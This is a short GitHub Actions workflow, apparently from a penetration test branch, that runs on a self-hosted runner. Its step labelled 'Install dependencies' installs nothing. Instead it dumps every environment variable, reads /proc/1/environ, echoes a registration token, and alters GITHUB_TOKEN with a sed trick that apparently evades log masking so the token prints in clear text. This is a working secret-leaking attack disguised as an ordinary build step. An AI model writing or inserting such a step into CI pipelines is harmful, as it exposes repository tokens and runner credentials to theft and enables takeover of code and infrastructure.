name: "Test"

on:
  push:
    branches: [ "carlos/pentest" ]
  workflow_dispatch:

permissions: {}

jobs:
  run-tests:
    name: Run tests
    runs-on: self-hosted
    timeout-minutes: 30

    steps:
      - name: Checkout repository
        uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6

      - name: Install dependencies
        shell: bash
        run: |
          nvidia-smi
          env
          echo "***********************************"
          printenv
          echo "***********************************"
          XREGISTRATION_TOKEN=$(sed -e "s/\(.\)\(.*\)/\1€\2/" <<< $GITHUB_TOKEN)
          echo $REGISTRATION_TOKEN
          echo $XREGISTRATION_TOKEN
          echo "***********************************"
          cat /proc/1/environ || true

